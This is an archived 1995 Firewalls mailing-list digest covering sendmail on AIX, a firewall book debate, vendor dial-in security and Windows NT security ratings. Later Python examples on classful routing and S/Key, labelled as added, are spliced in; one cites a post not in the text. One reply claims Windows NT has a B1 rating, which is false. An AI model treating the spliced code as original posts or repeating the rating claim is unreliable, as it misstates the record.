I'm running an application gateway with the TIS toolkit on an AIX 3.2 workstation. smap and smapd work fine, but I wish to remove the ugly suid root bit from /usr/sbin/sendmail. I did it, made the spool directory writable for it, but it didn't work.
In my syslog appeared "sendmail[14414]: send-mail : auditproc: Not owner". I found nothing in the FAQs, neither in the sendmail nor in the AIX-related ones.

Any idea?

TIA,
rolf

From firewalls-owner Sun Oct 8 09:30:21 1995
From: Doug Kaye
To: firewalls@GreatCircle.COM
Date: Sun, 08 Oct 1995 09:11:58 -0700
Subject: Firewall Subcontractor Wanted (Bay Area)

We are an Internet/email integrator in the San Francisco Bay Area and are beginning to receive a fair number of requests for quality firewall plans and implementations. Our workload does not permit us to address all of these opportunities directly. We are looking for experienced firewall designers who are willing to work as subcontractors to RDS.

If you are interested, please email me directly with qualifications (including security products you have used), your rates as a subcontractor and a brief statement of your philosophy towards the security audit and planning process.

Please do not respond if you are not in the SF Bay Area or if you are not very experienced in this area. We've got no shortage of people who *want* to be firewall designers -- we're looking for those few who are already good at it.

We're not an Internet startup. We are a 17-year-old integrator serving major California-based companies. Check us out at http://www.rds.com.

Thanks.
...doug

============================================================
Doug Kaye                    Rational Data Systems, Novato, CA
Tel: 415-382-8400            FAX: 415-382-8441
http://www.rds.com

From firewalls-owner Sun Oct 8 13:30:08 1995
From: Wilner@DOCKMASTER.NCSC.MIL
To: firewalls@GREATCIRCLE.COM
Date: Sun, 8 Oct 95 16:10 EDT
Subject: new firewall book (Chapman & Zwicky)

I just purchased and read Chapman and Zwicky's new book, Building Internet Firewalls. The discussions are clear, the authors' mastery of the technology is impressive, and the pictures are marvelous.

Yet, just as in the other firewall books, there is no mention of "meatier" INFOSEC issues, such as high-assurance trusted platforms or formal modeling of TCP/IP protocols.

There is little substantive discussion of denial of service, which is quite important. There is no mention of integrating firewall technology with COTS security products other than I&A tools. No mention of emerging technology pursuant to either NSA's MISSI program or NIST's PKC entity authentication research (q.v. Draft FIPS PUB "JJJ") is to be found.

What's the deal? It seems that the participants in this august forum are concerned only about cookbook-style approaches. "How can I run such-and-such application?" "What ports should I block in order to securely operate FOOBAR?" "What commands do I issue to my Telebit?" "How can I get DNS to do such-and-such on a screened-subnet doodad with DYNIX and NetWare?" This is all that people seem to want to discuss.
It is noted with sadness that challenges such as the one detailed in the preceding four paragraphs are never responded to. One takes that to mean either that everyone is in complete agreement and therefore no discussion is required, or that no one feels qualified to disagree in writing.

Bruce D. Wilner
--------------------------------------------------
no PGP key, no witticisms, no cutesy line graphics

From firewalls-owner Sun Oct 8 16:00:01 1995
From: Mark Jaeger
To: Firewalls@GreatCircle.COM
Date: Sun, 08 Oct 1995 18:37:17 -0400
Subject: Firewalls-Digest V4 #580 -Reply

Until I return from vacation on October 16, Linda Baker will receive a forwarded copy of all my correspondence.
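Worked example for Howard Berkowitz's RFC1597 note earlier in this digest, added here and not part of his post: it derives the classful major network at which a RIP or IGRP router would summarize (so that every subnet of 10.0.0.0 stays in every update), applies the per-subnet update figures he quotes, and detects the discontiguous layout he describes (two 172.20.0.0 LANs joined by a 172.21.0.0 serial line). The router names R1/R2 and the address plans are constructed.

```python
"""Classful-routing checks for an RFC1597 address plan (added example, not the post's code).

Byte figures come from Howard Berkowitz's post and are used as parameters; the
topologies are constructed.
"""
import ipaddress
from collections import defaultdict
from typing import Dict, List, Sequence, Set, Tuple

# Routing-update growth per additional subnet, as quoted in the post (bytes).
UPDATE_BYTES_PER_SUBNET = {"RIP": 24, "IGRP": 104}

# A segment is (prefix, routers attached to it); a stub LAN has one router.
Segment = Tuple[str, Sequence[str]]


def major_network(prefix: str) -> ipaddress.IPv4Network:
    """Classful major network of a prefix: /8, /16 or /24 chosen by the first octet.

    This is the only boundary a classful protocol summarizes at, so 10.2.3.0/24
    and 10.9.0.0/16 both belong to the single major network 10.0.0.0/8.
    """
    net = ipaddress.ip_network(prefix, strict=False)
    first = int(net.network_address) >> 24
    if first < 128:
        bits = 8      # class A
    elif first < 192:
        bits = 16     # class B
    elif first < 224:
        bits = 24     # class C
    else:
        raise ValueError(f"{prefix}: not a classful unicast network")
    return ipaddress.ip_network((int(net.network_address), bits), strict=False)


def classful_groups(prefixes: List[str]) -> Dict[str, List[str]]:
    """Group subnets by major network. A single group (all of 10.0.0.0) means a
    classful protocol has no border at which to summarize any of them."""
    groups: Dict[str, List[str]] = defaultdict(list)
    for p in prefixes:
        groups[str(major_network(p))].append(p)
    return dict(groups)


def update_growth(prefixes: List[str], protocol: str) -> int:
    """Lower bound on the extra bytes per routing update for these subnets."""
    return len(prefixes) * UPDATE_BYTES_PER_SUBNET[protocol]


def discontiguous_major_networks(segments: List[Segment]) -> Set[str]:
    """Return major networks whose subnets are separated by another major network.

    A major network is contiguous only if every router attached to it can reach
    every other such router using that major network's own segments. Otherwise a
    classful protocol hears the same major network from two directions with no
    way to tell the subnets apart, which is the failure the post describes.
    """
    routers: Dict[str, Set[str]] = defaultdict(set)
    adj: Dict[str, Dict[str, Set[str]]] = defaultdict(lambda: defaultdict(set))
    for prefix, attached in segments:
        major = str(major_network(prefix))
        routers[major].update(attached)
        for a in attached:
            adj[major][a].update(r for r in attached if r != a)
    broken: Set[str] = set()
    for major, members in routers.items():
        start = next(iter(members))
        seen, stack = {start}, [start]
        while stack:                      # flood using only this major's segments
            for nxt in adj[major][stack.pop()]:
                if nxt not in seen:
                    seen.add(nxt)
                    stack.append(nxt)
        if seen != members:
            broken.add(major)
    return broken


# Constructed address plans: the post's broken layout and one fix (renumbering
# the serial link into 172.20.0.0 so that major network becomes contiguous).
BROKEN_PLAN: List[Segment] = [
    ("172.20.1.0/24", ["R1"]),
    ("172.21.0.0/30", ["R1", "R2"]),   # serial line in a different major network
    ("172.20.2.0/24", ["R2"]),
]
FIXED_PLAN: List[Segment] = [
    ("172.20.1.0/24", ["R1"]),
    ("172.20.3.0/30", ["R1", "R2"]),
    ("172.20.2.0/24", ["R2"]),
]
TEN_NET_PLAN = ["10.1.0.0/16", "10.2.0.0/16", "10.3.0.0/16", "10.4.0.0/16"]

if __name__ == "__main__":
    print("10.0.0.0 groups:", classful_groups(TEN_NET_PLAN))
    print("RIP growth:", update_growth(TEN_NET_PLAN, "RIP"), "bytes")
    print("broken plan:", discontiguous_major_networks(BROKEN_PLAN))
    print("fixed plan:", discontiguous_major_networks(FIXED_PLAN))
```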
From firewalls-owner Sun Oct 8 17:00:08 1995
From: Alan Hannan
To: Wilner@DOCKMASTER.NCSC.MIL
Cc: firewalls@GreatCircle.COM
Date: Sun, 8 Oct 1995 18:56:38 -0500 (CDT)
Subject: Re: new firewall book (Chapman & Zwicky)

......... Wilner@DOCKMASTER.NCSC.MIL is rumored to have said:
]
] Yet, just as in the other firewall books, there is no mention
] of "meatier" INFOSEC issues, such as high-assurance trusted
] platforms or formal modeling of TCP/IP protocols. There is

IMHO this is not 'firewalling (read: separating networks according to a given security policy)'; these are host and network issues. True, both of these are required knowledge for firewalling, and also subsets of firewall theory. However, they are not wholly firewall related, and in my opinion should be considered separate topics. When one considers accounting, rarely do they cover aspects of addition.

] little substantive discussion of denial of service, which is
] quite important. There is no mention of integrating firewall
] technology with COTS security products other than I&A tools.
] No mention of emerging technology pursuant to either NSA's
] MISSI program or NIST's PKC entity authentication research
] (q.v. Draft FIPS PUB "JJJ") is to be found.

And this makes me quite happy. I have no interest in MISSI compliance, and I have yet to have a customer request it. If they did, I'd like to go read a book about MISSI and anal proprietary government standards, not a book about firewalling a network from the Internet.

] What's the deal? It seems that the participants in this
] august forum are concerned only about cookbook-style
] approaches. "How can I run such-and-such application?" "What
] ports should I block in order to securely operate FOOBAR?"
] "What commands do I issue to my Telebit?" "How can I get DNS
] to do such-and-such on a screened-subnet doodad with DYNIX and
] NetWare?" This is all that people seem to want to discuss.

This may be true with regards to books about firewalls; however, on at least two occasions in as many months we have had discussions about MISSI and Fortezza.

] It is noted with sadness that challenges such as the one
] detailed in the preceding four paragraphs are never responded
] to. One takes that to mean either that everyone is in
] complete agreement and therefore no discussion is required, or
] that no one feels qualified to disagree in writing.

Always the rebel, I had to reply :)

Most people here are involved in corporate network security. It's my opinion the breakdown would go something like this -->

    Corporate                  -- 35%
    Vendors and Developers     -- 35%
    Government Agencies        -- 15%
    Educational and Theorists  -- 15%

If you buy into this, then perhaps you'd buy that 75% of the money/focus for Vendors and Developers is for Corporate network security. Hence, 35% + (.75 * 35%) = at least 61% of the people here are interested in corporate network security. Couple that with the focus on Government Agencies --> 15% + .25*35% ==> 23% and we see that the government compliance issues are not as predominant.
Therefore, I think that explains it.

However, you make good points as to the desire to increase the "meat" discussed here. What is the general consensus? Are topics like Fortezza, B-1 compliance, etc welcome? I don't mind them, though on the same token, perhaps a mail list dedicated to the broader topic of Information Security would be appropriate. Conversely, if the topic directly relates to firewalls (like Fortezza might) then I'm interested... Hmm....

--
Alan Hannan                      http://www.mid.net/~alan
402/472-0239                     Network Systems/Security Administrator
MIDnet, Inc.

From firewalls-owner Sun Oct 8 17:30:11 1995
From: Edward Maillet
To: firewalls@greatcircle.com
Date: Sun, 8 Oct 1995 20:18:01 -0400 (EDT)
Subject: Vendor Dial-in

Anyone have any good ideas for allowing secure vendor dial-in? We have several vendors that occasionally need to dial in to our equipment to figure out what we broke :) or to assist in certain problems or configurations.

The most secure and reasonably flexible method is yanking the phone cord from the wall until someone from the vendor calls in reference to a current problem asking to dial in. The problem with that is how do I know it's really the vendor? (Then again, when the repair guy shows up with an MCI jacket, how do I really know he's from MCI. Yeah yeah yeah.)
I just recently had a problem that required my vendor to periodically dial-in to some equipment around the clock. I like my job but I'm not going to hang out 24hrs a day plugging & unplugging a stupid phone cord. We have a new database product that the vendor (a differnet one no less) requires an ISDN line running PPP to connect to our network for support. Yipes! This one I really don't like. I've thought about running the ISDN to a router outside my firewall and making them come through it. Right now my firewall is config'd not to let anyone in frome the outside period. I suppose I could setup something secure using the filtering capabilities of my router AND S/Key or SecureID on my firewall, but that doesn't seem very practical. I can here them calling up and saying the lost the secureID card! Any ideas? I hope this isn't one of those "Well, there is some risk you have to have." ----- Ed Maillet maillet@cs.usm.maine.edu From firewalls-owner Sun Oct 8 17:31:01 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA25023 for firewalls-outgoing; Sun, 8 Oct 1995 17:29:25 -0700 Received: from mimos.my (mimos.my [192.228.128.18]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA25016 for ; Sun, 8 Oct 1995 17:29:17 -0700 Received: from ms.mimos.my (ms.mimos.my [192.228.129.33]) by mimos.my (8.6.12/8.6.12) with SMTP id IAA04881; Mon, 9 Oct 1995 08:27:45 +0800 Received: by ms.mimos.my (5.64/7.0) id AA03125; Mon, 9 Oct 95 08:27:44 +0800 Date: Mon, 9 Oct 1995 08:27:44 +0800 From: Musaddik Mokhtar To: fwtk-users@tis.com Cc: firewalls@greatcircle.com Subject: http-gw with authentication Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I was wondering if anybody has gotten the FWTK's auth to work with http-gw. I would want it to work like when used with tn-gw and ftp-gw, i.e. users are authenticated before using the gateway. 
Would appreciate any help from experts and people who had gotten it to work, out there. Thanks in advance. - Musaddik. _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ _/ _/ _/ _/ Musaddik Mokhtar _/ dique@ms.mimos.my _/ _/ System Support Group _/ http://www.bsk.mimos.my/~dique _/ _/ Division of Computer Systems, _/ _/ _/ MIMOS, Malaysia _/ _/ _/ _/ _/ _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ From firewalls-owner Sun Oct 8 22:32:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id WAA02248 for firewalls-outgoing; Sun, 8 Oct 1995 22:30:19 -0700 Received: from spaatz.cap.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA22664 for ; Sun, 8 Oct 1995 14:16:12 -0700 Received: from Microsoft Mail (PU Serial #0) by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct08.161000.0.15735; Sun, 08 Oct 1995 16:15:32 -0500 From: CMILAM@cap.af.mil (Milam, Charles R. 1LT CAP) To: firewalls@GREATCIRCLE.COM (firewalls), Wilner@DOCKMASTER.NCSC.MIL (Wilner) Message-ID: <1995Oct08.161000.0.15735@spaatz.cap.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Sun, 08 Oct 1995 16:15:32 -0500 Subject: RE: new firewall book (Chapman & Zwicky) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > It is noted with sadness that challenges such as the one > detailed in the preceding four paragraphs are never responded > to. One takes that to mean either that everyone is in > complete agreement and therefore no discussion is required, or > that no one feels qualified to disagree in writing. I take it to mean that most folks are, like myself, already working 60-hour weeks, and therefore just too darn busy for academic discussion. 
Gimme that patch, lemme plug that hole, and let me get to item #352 on my to-do list. I found Chapman & Zwicky's book to be "just right" for a multitude of audiences. I have already successfully used excerpts from the book to get even our most "technically challenged" administrators up to speed and in agreement about our network's security. Chuck "Speaking only for myself..." From firewalls-owner Mon Oct 9 04:00:12 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA08078 for firewalls-outgoing; Mon, 9 Oct 1995 03:43:48 -0700 Received: from lokkur.dexter.mi.us (dexter-gw.dexter.msen.com [148.59.2.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA08071 for ; Mon, 9 Oct 1995 03:43:43 -0700 Received: (scs@localhost) by lokkur.dexter.mi.us (8.6.12/8.6.5) id GAA17153 for firewalls@GreatCircle.COM; Mon, 9 Oct 1995 06:40:44 -0400 Newsgroups: local.firewalls Path: scs From: scs@lokkur.dexter.mi.us (Steve Simmons) Subject: Re: new firewall book (Chapman & Zwicky) Message-ID: <1995Oct9.104042.17112@lokkur.dexter.mi.us> Organization: Inland Sea References: <951008201044.786003@DOCKMASTER.NCSC.MIL> Distribution: local Date: Mon, 9 Oct 95 10:40:42 GMT Lines: 14 Apparently-To: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Wilner@DOCKMASTER.NCSC.MIL writes: >Yet, just as in the other firewall books, there is no mention >of "meatier" INFOSEC issues, such as high-assurance trusted >platforms or formal modeling of TCP/IP protocols. There is >little substantive discussion of denial of service . . . [[ other criticisms deleted ]] Sounds to me like you've identified a market. Call O'Reilly, see if you can sell it. -- "For the last five years, the number of machines on the network has been rising between five and 10 times faster than the number of transistors on a chip." 
`THE COMING SOFTWARE SHIFT' by George Gilder, Forbes, 8/8/95 From firewalls-owner Mon Oct 9 04:30:34 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA08493 for firewalls-outgoing; Mon, 9 Oct 1995 04:04:45 -0700 Received: from TYO2.gate.nec.co.jp (TYO2.gate.nec.co.jp [202.32.8.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA08486 for ; Mon, 9 Oct 1995 04:04:41 -0700 Received: from mailsv.nec.co.jp ([133.200.254.203]) by TYO2.gate.nec.co.jp (8.6.11+2.5Wb2/3.3Wb-NEC-TYO2) with ESMTP id UAA19508 for ; Mon, 9 Oct 1995 20:03:18 +0900 Received: from pepsi.necsin.fc.nec.co.jp ([203.127.253.3]) by mailsv.nec.co.jp (8.6.12+2.5Wb7/3.3W-95100416) with SMTP id UAA01233 for ; Mon, 9 Oct 1995 20:03:14 +0900 Received: from wpo by pepsi.necsin.fc.nec.co.jp (5.64/6.4J.5) id AA01660; Mon, 9 Oct 95 20:03:57 +0900 Received: from NEC-Message_Server by wpo.necsin.fc.nec.co.jp with Novell_GroupWise; Mon, 09 Oct 1995 18:59:52 +0800 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Mon, 09 Oct 1995 15:08:20 +0800 From: Xin LI To: firewalls@GreatCircle.com Subject: B2 rated WIndows NT? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, there: It's said that there is secure version of Windows NT rated B class(probably B2) available. Does any one know where can I get more information about that? Any advice and information are welcome and very appreciated. Thanks in advance, Li, Xin Senior System Engineer NEC Singapore Pte Ltd No. 
1 Maritime Square #12-10 World Trade Center Tel: +65-277-2227 Singapore, 099253 Fax:+65-271-5988 Republic of Singapore Email: lixin@wpo.necsin.fc.nec.co.jp From firewalls-owner Mon Oct 9 04:31:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id EAA09258 for firewalls-outgoing; Mon, 9 Oct 1995 04:23:54 -0700 Received: from TYO2.gate.nec.co.jp (TYO2.gate.nec.co.jp [202.32.8.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id EAA09244 for ; Mon, 9 Oct 1995 04:23:47 -0700 Received: from mailsv.nec.co.jp ([133.200.254.203]) by TYO2.gate.nec.co.jp (8.6.11+2.5Wb2/3.3Wb-NEC-TYO2) with ESMTP id UAA21226 for ; Mon, 9 Oct 1995 20:22:22 +0900 Received: from pepsi.necsin.fc.nec.co.jp ([203.127.253.3]) by mailsv.nec.co.jp (8.6.12+2.5Wb7/3.3W-95100416) with SMTP id UAA02949 for ; Mon, 9 Oct 1995 20:22:18 +0900 Received: from wpo by pepsi.necsin.fc.nec.co.jp (5.64/6.4J.5) id AA01680; Mon, 9 Oct 95 20:22:58 +0900 Received: from NEC-Message_Server by wpo.necsin.fc.nec.co.jp with Novell_GroupWise; Mon, 09 Oct 1995 19:22:02 +0800 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Mon, 09 Oct 1995 19:21:16 +0800 From: Xin LI To: firewalls@GreatCircle.com Subject: B2 rated WIndows NT? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, there: It's said that there is secure version of Windows NT rated B class(probably B2) available. Does any one know where can I get more information about that? Any advice and information are welcome and very appreciated. Thanks in advance, Li, Xin Senior System Engineer NEC Singapore Pte Ltd No. 
1 Maritime Square #12-10 World Trade Center Tel: +65-277-2227 Singapore, 099253 Fax:+65-271-5988 Republic of Singapore Email: lixin@wpo.necsin.fc.nec.co.jp From firewalls-owner Mon Oct 9 05:30:29 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id FAA10987 for firewalls-outgoing; Mon, 9 Oct 1995 05:12:36 -0700 Received: from eagle.idshq.com (eagle.idshq.com [199.100.93.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id FAA10972 for ; Mon, 9 Oct 1995 05:12:27 -0700 From: Mark_Podracky@idshq.com Received: from smtpgtwy.idshq.com (smtpgtwy.idshq.com [199.100.93.5]) by eagle.idshq.com (8.6.10/8.6.10) with SMTP id EAA12719; Mon, 9 Oct 1995 04:05:09 -0400 Received: from cc:Mail by smtpgtwy.idshq.com id AA813251431 Mon, 09 Oct 95 08:10:31 EST Date: Mon, 09 Oct 95 08:10:31 EST Message-Id: <9509098132.AA813251431@smtpgtwy.idshq.com> To: firewalls@GreatCircle.com, Xin LI Subject: Re: B2 rated WIndows NT? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There is not a B Level version currently available. There is a C2 Version available. Several companies are investigating and some have started building a B Level version, however. There are B Level network components available such as TNT DNSIX from Global Internet Software Group in Monticello, IL: Global Internet Software Group (formerly, Blue Ridge Software, Inc.) 107 S. State St., P.O. Box 406, Monticello, IL 61856 217-762-2375 Fax:-5408 Hope this helps ... Mark A. Podracky Sr. Information Security Specialist Integrated Data Systems 14170 Newbrook Drive, Suite 201 Chantilly, VA 22021-2223 703-803-9115 extension 19 ______________________________ Reply Separator _________________________________ Subject: B2 rated WIndows NT? Author: Xin LI at ccSMTP Date: 10/9/95 8:00 AM Hi, there: It's said that there is secure version of Windows NT rated B class(probably B2) available. Does any one know where can I get more information about that? 
Any advice and information are welcome and very appreciated. Thanks in advance, Li, Xin Senior System Engineer NEC Singapore Pte Ltd No. 1 Maritime Square #12-10 World Trade Center Tel: +65-277 -2227 Singapore, 099253 Fax:+65-271- 5988 Republic of Singapore Email: lixin @wpo.necsin.fc.nec.co.jp From firewalls-owner Mon Oct 9 07:30:21 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA12675 for firewalls-outgoing; Mon, 9 Oct 1995 07:20:29 -0700 Received: from uud01.capvolmac.nl (uud01.capvolmac.nl [193.78.92.33]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id HAA12668 for ; Mon, 9 Oct 1995 07:20:24 -0700 Received: from inetgate.capvolmac.nl by uud01.capvolmac.nl (uud01 3.2/UCB 5.64/4.03) id AA16093; Mon, 9 Oct 1995 15:19:02 +0100 Received: from WUD00-Message_Server by inetgate.capvolmac.nl with Novell_GroupWise; Mon, 09 Oct 1995 15:17:00 +0100 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Mon, 09 Oct 1995 13:43:37 +0100 From: Sander Wels To: firewalls@greatcircle.com Subject: Vendor Dial-in (A) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Met vriendelijke groet/kind regards Sander Wels ------------------------------------------------- - Cap Volmac, - PO 2575, 3500 GN Utrecht, - The Netherlands +31-(0)30-2526828 - SWels@inetgate.capvolmac.nl - x400: S=SWels/PRMD=Cap Volmac/ADMD=400net/ - ORG=X400Gate/C=NL ------------------------------------------------- >>> Edward Maillet 09-10-1995 1:18 >>> >Anyone have any good ideas for allowing secure vendor dial-in? We are strugling with the same problem. The solution we came up with is as simple as efficient. We use PC Anywhere to remotely takeover a PC. The vendor can dial-in and hack the net while we can follow, monitor and assist, for example typing passwords. This may also be the solution for your problem where the vendor has to dial-in during a longer period of time. 
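Ed Maillet's question in this thread names S/Key on the firewall as one option for the dial-in host, and the reply above proposes a monitored PC Anywhere session instead. What follows is an added example, written for this page and not taken from either post or from the S/Key distribution: a model of the S/Key hash chain (RFC 1760) showing why a one-time password that a vendor reads over the phone, or that is captured on the modem line, cannot be replayed. RFC 1760 uses MD4 folded to 64 bits as its one-way step; this model substitutes SHA-256 so the chain itself is easy to follow. The user name, seed and passphrase are made up.

```python
"""S/Key-style one-time passwords for a dial-in host.

Added example; it is not from the original posts and not the S/Key
distribution.  RFC 1760 S/Key derives each password by repeatedly
applying MD4 folded to 64 bits; this model uses SHA-256 in its place so
the chain mechanics are visible without the folding step.  The seed,
passphrase and user name below are made up.
"""
import hashlib
import hmac


def h(x: bytes) -> bytes:
    """One step of the chain (stand-in for S/Key's folded MD4)."""
    return hashlib.sha256(x).digest()


def chain(seed: str, passphrase: str, n: int) -> bytes:
    """H^n(seed || passphrase): the n-th element of the one-way chain."""
    v = (seed + passphrase).encode()
    for _ in range(n):
        v = h(v)
    return v


class SKeyServer:
    """Per user the host keeps only the seed, the sequence number and the
    last OTP it accepted.  The passphrase never reaches the host, and an
    eavesdropper who records OTP number k still needs a preimage of it to
    forge OTP number k-1, so a captured password is useless next time."""

    def __init__(self):
        self.db = {}

    def register(self, user: str, seed: str, passphrase: str, n: int = 100):
        # Initialisation is the one step done out of band (console, not modem).
        self.db[user] = {"seed": seed, "seq": n,
                         "last": chain(seed, passphrase, n)}

    def challenge(self, user: str):
        """What the host sends the caller: the sequence number to compute
        and the seed.  Both are public; the passphrase is the secret."""
        rec = self.db[user]
        return rec["seq"] - 1, rec["seed"]

    def login(self, user: str, otp: bytes) -> bool:
        rec = self.db[user]
        if rec["seq"] <= 1:
            return False                      # chain exhausted: re-register
        if not hmac.compare_digest(h(otp), rec["last"]):
            return False                      # replay, typo or wrong passphrase
        rec["last"], rec["seq"] = otp, rec["seq"] - 1   # accept and move down
        return True


def client_response(seed: str, passphrase: str, seq: int) -> bytes:
    """The caller's side (or the printed list of passwords they carry)."""
    return chain(seed, passphrase, seq)


def demo():
    """Four successful vendor logins, then a replay and a wrong passphrase."""
    srv = SKeyServer()
    pw = "correct horse battery staple"            # made-up passphrase
    srv.register("vendor", "fw12345", pw, n=6)
    results = []
    for _ in range(4):
        seq, seed = srv.challenge("vendor")
        otp = client_response(seed, pw, seq)
        results.append(srv.login("vendor", otp))
    replay = srv.login("vendor", otp)               # same OTP again: rejected
    wrong = srv.login("vendor", client_response("fw12345", "guess", 1))
    return results, replay, wrong, srv.db["vendor"]["seq"]


if __name__ == "__main__":
    print(demo())
```

The point for the dial-in case is in `login`: the host verifies by hashing what the caller sent and comparing with the previously accepted value, so the stored value is never a usable password, and once the chain runs down to one the vendor has to be re-initialised over a trusted path rather than over the modem.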
From firewalls-owner Mon Oct 9 08:31:03 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA13453 for firewalls-outgoing; Mon, 9 Oct 1995 08:04:13 -0700
Received: from pimaia1y.prodigy.com (pimaia1y.prodigy.com [192.207.105.44]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA13446 for ; Mon, 9 Oct 1995 08:04:10 -0700
Received: from sp2ctrlt.prodigy.com ([199.4.137.50]) by pimaia1y.prodigy.com (8.6.10/8.6.9) with ESMTP id KAA72076 for ; Mon, 9 Oct 1995 10:27:23 -0400
Received: (from frank@localhost) by sp2ctrlt.prodigy.com (8.6.12/8.6.12) id KAA28700; Mon, 9 Oct 1995 10:27:23 -0400
Date: Mon, 9 Oct 1995 10:27:23 -0400 (EDT)
From: Frank Wortner
To: firewalls@GreatCircle.Com
Subject: Re: sendmail on AIX without suid root?
In-Reply-To: <9510081622.AA07034@iez.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

IBM's sendmail interfaces with the AIX audit subsystem --- AIX has a pile of subsystems and capabilities that no one is aware of or uses (*) --- and that requires root authority. I suspect that sendmail is trying to set some audit parameters and failing. If you still want to delete the setuid-root permissions, try replacing AIX's sendmail with the most current Berkeley sendmail (ftp://ftp.cs.berkeley.edu/ucb/sendmail/).

(*) Some of them may actually be useful.

-- Frank
Frank Wortner, Prodigy Services Company
mailto:frank@prodigy.com   http://pages.prodigy.com/NY/frank
Opinions are solely mine, facts belong to no one in particular.

On Sun, 8 Oct 1995, Rolf-Weber wrote:

> Hi all,
>
> I'm running an application gateway with the TIS toolkit on
> an AIX 3.2 workstation. smap and smapd work fine, but I wish
> to remove the ugly suid root bit from /usr/sbin/sendmail.
> I did it, made the spool directory writable for it, but it
> didn't work. In my syslog appeared
> "sendmail[14414]: send-mail : auditproc: Not owner"
> I found nothing in the FAQs, neither in the sendmail nor the AIX
> related.
> Any idea?
>
> TIA,
> rolf
>

From firewalls-owner Mon Oct 9 09:00:18 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA14171 for firewalls-outgoing; Mon, 9 Oct 1995 08:33:08 -0700
Received: from mwunix.mitre.org (mwunix.mitre.org [128.29.154.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA14155 for ; Mon, 9 Oct 1995 08:33:02 -0700
Received: from tgate2.mitre.org (tgate2.mitre.org [128.29.154.211]) by mwunix.mitre.org (8.6.10/8.6.4) with SMTP id LAA18201 for <@mwunix.mitre.org:firewalls@GreatCircle.COM>; Mon, 9 Oct 1995 11:31:44 -0400
Received: from [128.29.250.7:2674] by tgate1 with SMTP id A403984 ; Mon, 9 Oct 95 11:31:31 EDT
Received: by mail06.mitre.org; (5.65/1.1.8.2/22Jun94-0628PM) id AA26923; Mon, 9 Oct 1995 11:34:04 -0400
Subject: Re: B2 rated WIndows NT?
From: bell@mail06.mitre.org (D. Elliott Bell)
To: firewalls@GreatCircle.COM
Message-Id: <951009113402.19096@mail06.mitre.org.0>
Date: Mon, 9 Oct 95 11:34:04 -0400
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Windows NT received its B1 rating late this summer. Not B2.

>
>
> There is not a B Level version currently available. There is a C2
> Version available. Several companies are investigating and some have
> started building a B Level version, however. There are B Level network
> components available such as TNT DNSIX from Global Internet Software
> Group in Monticello, IL:
>
> Global Internet Software Group (formerly, Blue Ridge Software, Inc.)
> 107 S. State St., P.O. Box 406, Monticello, IL 61856
> 217-762-2375 Fax:-5408
>
> Hope this helps ...
>
> Mark A. Podracky
> Sr. Information Security Specialist
> Integrated Data Systems
> 14170 Newbrook Drive, Suite 201
> Chantilly, VA 22021-2223
>
> 703-803-9115 extension 19
>
> ______________________________ Reply Separator _________________________________
> Subject: B2 rated WIndows NT?
> Author: Xin LI at ccSMTP
> Date: 10/9/95 8:00 AM
>
> Hi, there:
>
> It's said that there is a secure version of Windows NT rated B class (probably B2)
> available. Does anyone know where I can get more information about that?
>
> Any advice and information are welcome and very appreciated.
>
> Thanks in advance,
>
> Li, Xin
>
> Senior System Engineer
> NEC Singapore Pte Ltd
> No. 1 Maritime Square #12-10
> World Trade Center
> Singapore, 099253
> Republic of Singapore
> Tel: +65-277-2227
> Fax: +65-271-5988
> Email: lixin@wpo.necsin.fc.nec.co.jp
>

From firewalls-owner Mon Oct 9 09:01:02 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA14191 for firewalls-outgoing; Mon, 9 Oct 1995 08:34:11 -0700
